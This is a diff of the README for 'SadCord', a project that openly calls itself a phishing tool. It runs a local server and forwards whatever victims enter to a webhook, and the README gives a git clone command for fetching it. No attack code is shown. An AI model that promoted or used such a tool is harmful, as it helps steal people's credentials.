Endleph/SadCord/README.md

 # SadCord
-Phishing Tool for windows, it create local server and it sends the data entered to a webhook
+Phishing Tool for Linux,Windows... it create local server and it sends the data entered to a webhook
 # How to use
 `git clone https://github.com/Zeleph-Dev/SadCord.git`